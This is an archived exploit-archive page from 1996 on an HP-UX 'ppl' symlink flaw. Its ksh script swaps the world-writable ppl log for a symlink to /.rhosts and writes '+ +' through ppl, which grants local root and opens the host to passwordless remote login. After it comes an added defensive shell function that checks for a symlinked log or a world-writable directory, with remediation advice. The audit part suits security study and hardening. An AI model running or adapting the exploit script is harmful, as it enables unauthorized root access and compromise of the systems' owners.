HP/UX ppl symlink problem
Description: ppl insecurely creates log files in a world-writable directory; I'm sure you can see where this is headed.
Author: Colonel Panic of SOD (sod@command.com.inter.net)
Compromise: root (local)
Vulnerable Systems: HP/UX with vulnerable ppl, 9.x, 10.x
Date: October 1996
Notes: See the SOD HP Bug of the Week page
Exploit:
#!/bin/ksh
# need update for 10.X
# 10.X =/var/ppl/log
VER=`uname -r | cut -f2 -d.`
if [ "${VER}" = "10" ]
then
    LOG=/var/ppl/log
else
    LOG=/usr/spool/ppl/log
fi
mv $LOG $LOG.old
ln -s /.rhosts $LOG
ppl -o '\
+ +
'
rm $LOG
mv $LOG.old $LOG
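
A defensive check for the condition described above, added here as an example and not part of the original page or of any HP tool: it reports whether a privileged program's log file is a symbolic link and whether its directory is world-writable. The function name `audit_log_path` and the message wording are assumptions; the two paths come from the script above.

```shell
#!/bin/sh
# Added example: audit a log path for the two conditions the ppl problem
# depends on. Function name and messages are illustrative.

# audit_log_path LOGFILE
# Prints one finding per line; returns 0 if nothing risky, 1 otherwise.
audit_log_path() {
    log=$1
    dir=$(dirname "$log")
    rc=0

    # A log that is itself a symlink sends a root-owned write elsewhere.
    if [ -L "$log" ]; then
        echo "RISK: $log is a symbolic link"
        rc=1
    fi

    if [ ! -d "$dir" ]; then
        echo "INFO: $dir does not exist"
        return "$rc"
    fi

    # Mode string from ls -ldL (follows a symlinked directory), e.g.
    # drwxrwxrwx: character 9 is the other-write bit, character 10 is
    # x, t or T (t/T means the sticky bit is set).
    mode=$(ls -ldL "$dir" | cut -c1-10)
    other_w=$(printf '%s' "$mode" | cut -c9)
    last=$(printf '%s' "$mode" | cut -c10)

    if [ "$other_w" = "w" ]; then
        case $last in
            # Sticky bit: only the entry's owner, the directory's owner
            # or root may rename or remove an entry.
            t|T) echo "WARN: $dir is world-writable (sticky bit set)" ;;
            *)   echo "RISK: $dir is world-writable without the sticky bit"
                 rc=1 ;;
        esac
    fi
    return "$rc"
}

# Paths taken from the script above (HP-UX 10.x and 9.x respectively).
for p in /var/ppl/log /usr/spool/ppl/log; do
    audit_log_path "$p" || true
done
```

A RISK line for either path means the log directory should be owned by root and have its world-write bit removed, and any symlink found in place of the log should be investigated before it is deleted.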
This page is part of Fyodor's exploit world.